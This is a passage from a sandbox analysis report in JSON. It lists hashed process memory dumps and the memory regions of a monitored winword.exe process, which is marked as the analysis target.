"md5_hash": "620f0b67a91f7f74151bc5be745b7110", "ref_process": { "ref_id": "proc_25", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "1ceaf73df40e531df3bfb26b4fb7cd95fb7bff1d", "sha256_hash": "ad7facb2586fc6e966c004d7d1d16b024f5805ff7cb47c7a85dabd8b48892ca7", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000025-region_00001511-addr_0x00000000008e0000-size_0x0000000000040000-perm_rw.bin", "filename": "process_00000025-region_00001511-addr_0x00000000008e0000-size_0x0000000000040000-perm_rw.bin", "id": "proc_dump_309", "md5_hash": "89bf40eb91f29109b1a7abf08cdfd720", "ref_process": { "ref_id": "proc_25", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "1a8a76c21403596909fdef7fc1539564b3e1e000", "sha256_hash": "14325d8acb69f8a08f09c6b440bd849147d063d021e184f81013828cd80577b7", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000025-region_00001512-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000025-region_00001512-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_310", "md5_hash": "47509f70b11b9d61c1af3377be358a76", "ref_process": { "ref_id": "proc_25", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "960a8d7567bf64b11787665e9dca4fd7cfad36a2", "sha256_hash": "eca889248b8f65a434de66334214d4938e6b19c0518016b662f9d4cd15f63499", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000025-region_00001513-addr_0x0000000000490000-size_0x0000000000040000-perm_rw.bin", "filename": "process_00000025-region_00001513-addr_0x0000000000490000-size_0x0000000000040000-perm_rw.bin", "id": "proc_dump_311", "md5_hash": "daf84cc2647de2bfa190d07156728929", "ref_process": { "ref_id": "proc_25", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "da5b7c7c253a0726eb856e3333b47c4cc7d502cd", "sha256_hash": "8b926a91e1546537116976221854b548ef3f1a3037e688c60b2fff67da840e30", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000025-region_00001514-addr_0x0000000000950000-size_0x0000000000040000-perm_rw.bin", "filename": "process_00000025-region_00001514-addr_0x0000000000950000-size_0x0000000000040000-perm_rw.bin", "id": "proc_dump_312", "md5_hash": "3f2782ffaa496557985f6e2c93c316f7", "ref_process": { "ref_id": "proc_25", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "2e6568190e6831d506a20ed1b916b2c7d03e0c94", "sha256_hash": "976ee22434e0b888af1259b2a33634f959ecad3c8febea5bf0f8df6da6855cef", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000025-region_00001515-addr_0x000000007ffdc000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000025-region_00001515-addr_0x000000007ffdc000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_313", "md5_hash": "752ca6043a46e20cbf9763d91960d815", "ref_process": { "ref_id": "proc_25", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "5f1ed4be16030e9fff44553e46c5546243eaae22", "sha256_hash": "3309b957d7ac91a77a76182321b4aee4b22aa2b0386e7bbd0631edcfe2ef450a", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000025-region_00001516-addr_0x000000007ffdd000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000025-region_00001516-addr_0x000000007ffdd000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_314", "md5_hash": "87d480c633255f098dd2a5705f7c267c", "ref_process": { "ref_id": "proc_25", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "288fa3a8d96d05f09418a51d27265ddc63e7a46f", "sha256_hash": "da167d7f51594fd53314da96f88380e7024cf6ac02ccfdbce8f47a2dfa11e392", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000025-region_00001518-addr_0x0000000000990000-size_0x0000000000120000-perm_rw.bin", "filename": "process_00000025-region_00001518-addr_0x0000000000990000-size_0x0000000000120000-perm_rw.bin", "id": "proc_dump_315", "md5_hash": "1f48df67f585566079b7b690d97cb25b", "ref_process": { "ref_id": "proc_25", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "905a913e08a84207c72ad40eb48a29f8cfbae012", "sha256_hash": "098b241c3b13317049efdbf9f91ff96baac6821b0a620298c822941cd478e3e8", "size": 1179648, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000026-region_00001522-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "filename": "process_00000026-region_00001522-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "id": "proc_dump_316", "md5_hash": "e915cd8c6cfc223c66c138e3cd99701a", "ref_process": { "ref_id": "proc_26", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "97424f852cf7d7cd255aa3da732df570b1bf71d6", "sha256_hash": "faab567ef9ae30e78ec519c1877430c0831225d35e8b27ab0085817934dc8aea", "size": 131072, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000026-region_00001525-addr_0x00000000000f0000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000026-region_00001525-addr_0x00000000000f0000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_317", "md5_hash": "52a531dd3670adf851c13ec2ea945444", "ref_process": { "ref_id": "proc_26", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0803dae8f0ec407a55e0c47ad072c4061c7e8398", "sha256_hash": "cedd16337067b473de9f5d16da378cf6bd5081954f66d2ba1f2fe343983cd128", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000026-region_00001530-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000026-region_00001530-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_318", "md5_hash": "46deaf338c053e4a6482f35c2e861167", "ref_process": { "ref_id": "proc_26", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "4adb6b6b8cea9052bdec394e0e0d0e66617c9049", "sha256_hash": "9622ed388a4794d917d8605a6381f5f4db8b110fe74e2fe3f92c4ce0a6c9c768", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000026-region_00001531-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000026-region_00001531-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_319", "md5_hash": "df94f4bb69615a9139b8cbfd2c521619", "ref_process": { "ref_id": "proc_26", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "be38d4cd7fe1c6c5d44e92dc8a952b049975c90d", "sha256_hash": "a8f9611012a2222a4583e7033b8e2b78de149159566387d4b2fc2fb212645e1f", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000026-region_00001535-addr_0x0000000000240000-size_0x0000000000010000-perm_rw.bin", "filename": "process_00000026-region_00001535-addr_0x0000000000240000-size_0x0000000000010000-perm_rw.bin", "id": "proc_dump_320", "md5_hash": "5bf2d9ba59d969c3d65bc4d7a8239f4f", "ref_process": { "ref_id": "proc_26", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "c9a3caae731790a890fe70478460423b0ac9063d", "sha256_hash": "95941ab2ce42147539e3dba5caf943e262b635a07b2d4dd6093377a964ebfd46", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000026-region_00001536-addr_0x0000000000370000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000026-region_00001536-addr_0x0000000000370000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_321", "md5_hash": "cc22b3dfa35b9ae3982d7caa251e6d2d", "ref_process": { "ref_id": "proc_26", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "b8c39ab0edea60b68c890eddfe477feecec347cb", "sha256_hash": "847b3b2e6b0a23ca0b63970b816b642036c9fe3621eb73b63ad228a1d65295e0", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000026-region_00001551-addr_0x00000000000e0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000026-region_00001551-addr_0x00000000000e0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_322", "md5_hash": "162be08fb256ce149251783b5d950182", "ref_process": { "ref_id": "proc_26", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "8d07f63681f79baed21869d16b3e702f0a8c3e0a", "sha256_hash": "7b7d8afc65f2028851f6747d7e77724ccedc18b203f5ddcc6ca3731fa3c18a00", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000026-region_00001552-addr_0x00000000001f0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000026-region_00001552-addr_0x00000000001f0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_323", "md5_hash": "620f0b67a91f7f74151bc5be745b7110", "ref_process": { "ref_id": "proc_26", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "1ceaf73df40e531df3bfb26b4fb7cd95fb7bff1d", "sha256_hash": "ad7facb2586fc6e966c004d7d1d16b024f5805ff7cb47c7a85dabd8b48892ca7", "size": 4096, "type": "process_dump", "version": 1 } ], "processes": [ { "cmd_line": "\"C:\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE\"", "filename": "c:\\program files\\microsoft office\\office15\\winword.exe", "id": "proc_1", "image_name": "winword.exe", "monitor_reason": "analysis_target", "monitored_id": 1, "origin_monitor_id": 0, "ref_parent_process": null, "regions": [ { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_136", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_137", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_138", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 278527, "entry_point": 0, "filename": null, "id": "region_139", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_140", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 790527, "entry_point": 0, "filename": null, "id": "region_141", "name": "private_0x00000000000c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 786432, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 860159, "entry_point": 0, "filename": null, "id": "region_142", "name": "pagefile_0x00000000000d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 851968, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 925695, "entry_point": 0, "filename": null, "id": "region_143", "name": "pagefile_0x00000000000e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 917504, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 1802239, "entry_point": 0, "filename": null, "id": "region_144", "name": "pagefile_0x00000000000f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 983040, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 1839103, "entry_point": 0, "filename": null, "id": "region_145", "name": "private_0x00000000001c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1835008, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 2949119, "entry_point": 0, "filename": null, "id": "region_146", "name": "private_0x00000000001d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1900544, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 2949120, "type": "region", "version": 1 }, "end_va": 4001791, "entry_point": 0, "filename": null, "id": "region_147", "name": "pagefile_0x00000000002d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2949120, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 4067327, "entry_point": 0, "filename": null, "id": "region_148", "name": "private_0x00000000003e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4063232, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 4128768, "type": "region", "version": 1 }, "end_va": 4194303, "entry_point": 0, "filename": null, "id": "region_149", "name": "private_0x00000000003f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4128768, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4202495, "entry_point": 0, "filename": null, "id": "region_150", "name": "pagefile_0x0000000000400000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4194304, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 4259840, "type": "region", "version": 1 }, "end_va": 4300799, "entry_point": 0, "filename": null, "id": "region_151", "name": "private_0x0000000000410000", "norm_filename": null, "region_type": "private_memory", "start_va": 4259840, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "" ], "ref_process_dump": null, "size": 65536, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 4390911, "entry_point": 0, "filename": null, "id": "region_152", "name": "private_0x0000000000420000", "norm_filename": null, "region_type": "private_memory", "start_va": 4325376, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 4390912, "type": "region", "version": 1 }, "end_va": 5439487, "entry_point": 0, "filename": null, "id": "region_153", "name": "private_0x0000000000430000", "norm_filename": null, "region_type": "private_memory", "start_va": 4390912, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 200704, "start_va": 5439488, "type": "region", "version": 1 }, "end_va": 5640191, "entry_point": 0, "filename": null, "id": "region_154", "name": "private_0x0000000000530000", "norm_filename": null, "region_type": "private_memory", "start_va": 5439488, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 5701632, "type": "region", "version": 1 }, "end_va": 5767167, "entry_point": 0, "filename": null, "id": "region_155", "name": "private_0x0000000000570000", "norm_filename": null, "region_type": "private_memory", "start_va": 5701632, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 5767168, "type": "region", "version": 1 }, "end_va": 6680575, "entry_point": 0, "filename": null, "id": "region_156", "name": "pagefile_0x0000000000580000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5767168, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 6684672, "type": "region", "version": 1 }, "end_va": 6713343, "entry_point": 0, "filename": null, "id": "region_157", "name": "pagefile_0x0000000000660000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6684672, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 6750208, "type": "region", "version": 1 }, "end_va": 6758399, "entry_point": 0, "filename": null, "id": "region_158", "name": "pagefile_0x0000000000670000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6750208, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 6815744, "type": "region", "version": 1 }, "end_va": 6819839, "entry_point": 0, "filename": null, "id": "region_159", "name": "private_0x0000000000680000", "norm_filename": null, "region_type": "private_memory", "start_va": 6815744, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 6881280, "type": "region", "version": 1 }, "end_va": 6889471, "entry_point": 0, "filename": null, "id": "region_160", "name": "pagefile_0x0000000000690000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6881280, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 6946816, "type": "region", "version": 1 }, "end_va": 6950911, "entry_point": 0, "filename": null, "id": "region_161", "name": "private_0x00000000006a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 6946816, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 7012352, "type": "region", "version": 1 }, "end_va": 7077887, "entry_point": 0, "filename": null, "id": "region_162", "name": "private_0x00000000006b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 7012352, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 7077888, "type": "region", "version": 1 }, "end_va": 7081983, "entry_point": 0, "filename": null, "id": "region_163", "name": "private_0x00000000006c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 7077888, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 7143424, "type": "region", "version": 1 }, "end_va": 7147519, "entry_point": 0, "filename": null, "id": "region_164", "name": "private_0x00000000006d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 7143424, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 7208960, "type": "region", "version": 1 }, "end_va": 7213055, "entry_point": 0, "filename": null, "id": "region_165", "name": "private_0x00000000006e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 7208960, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 7274496, "type": "region", "version": 1 }, "end_va": 7278591, "entry_point": 0, "filename": null, "id": "region_166", "name": "pagefile_0x00000000006f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7274496, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 7340032, "type": "region", "version": 1 }, "end_va": 8388607, "entry_point": 0, "filename": null, "id": "region_167", "name": "private_0x0000000000700000", "norm_filename": null, "region_type": "private_memory", "start_va": 7340032, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 8388608, "type": "region", "version": 1 }, "end_va": 8392703, "entry_point": 0, "filename": null, "id": "region_168", "name": "private_0x0000000000800000", "norm_filename": null, "region_type": "private_memory", "start_va": 8388608, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 8454144, "type": "region", "version": 1 }, "end_va": 8458239, "entry_point": 0, "filename": null, "id": "region_169", "name": "private_0x0000000000810000", "norm_filename": null, "region_type": "private_memory", "start_va": 8454144, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 8519680, "type": "region", "version": 1 }, "end_va": 8523775, "entry_point": 0, "filename": null, "id": "region_170", "name": "private_0x0000000000820000", "norm_filename": null, "region_type": "private_memory", "start_va": 8519680, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 8585216, "type": "region", "version": 1 }, "end_va": 8589311, "entry_point": 0, "filename": null, "id": "region_171", "name": "private_0x0000000000830000", "norm_filename": null, "region_type": "private_memory", "start_va": 8585216, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 8650752, "type": "region", "version": 1 }, "end_va": 8654847, "entry_point": 0, "filename": null, "id": "region_172", "name": "private_0x0000000000840000", "norm_filename": null, "region_type": "private_memory", "start_va": 8650752, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 8716288, "type": "region", "version": 1 }, "end_va": 8720383, "entry_point": 0, "filename": null, "id": "region_173", "name": "private_0x0000000000850000", "norm_filename": null, "region_type": "private_memory", "start_va": 8716288, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 8781824, "type": "region", "version": 1 }, "end_va": 8785919, "entry_point": 0, "filename": null, "id": "region_174", "name": "private_0x0000000000860000", "norm_filename": null, "region_type": "private_memory", "start_va": 8781824, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 8847360, "type": "region", "version": 1 }, "end_va": 8851455, "entry_point": 0, "filename": null, "id": "region_175", "name": "private_0x0000000000870000", "norm_filename": null, "region_type": "private_memory", "start_va": 8847360, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 8912896, "type": "region", "version": 1 }, "end_va": 8916991, "entry_point": 0, "filename": null, "id": "region_176", "name": "private_0x0000000000880000", "norm_filename": null, "region_type": "private_memory", "start_va": 8912896, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 8978432, "type": "region", "version": 1 }, "end_va": 8982527, "entry_point": 0, "filename": null, "id": "region_177", "name": "private_0x0000000000890000", "norm_filename": null, "region_type": "private_memory", "start_va": 8978432, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 9043968, "type": "region", "version": 1 }, "end_va": 9109503, "entry_point": 0, "filename": null, "id": "region_178", "name": "private_0x00000000008a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 9043968, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 9109504, "type": "region", "version": 1 }, "end_va": 10158079, "entry_point": 0, "filename": null, "id": "region_179", "name": "private_0x00000000008b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 9109504, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 10158080, "type": "region", "version": 1 }, "end_va": 10289151, "entry_point": 0, "filename": null, "id": "region_180", "name": "private_0x00000000009b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 10158080, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 10289152, "type": "region", "version": 1 }, "end_va": 10293247, "entry_point": 0, "filename": null, "id": "region_181", "name": "private_0x00000000009d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 10289152, "timestamp": "00:00:11.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 10354688, "type": "region", "version": 1 }, "end_va": 10420223, "entry_point": 0, "filename": null, "id": "region_182", "name": "private_0x00000000009e0000", 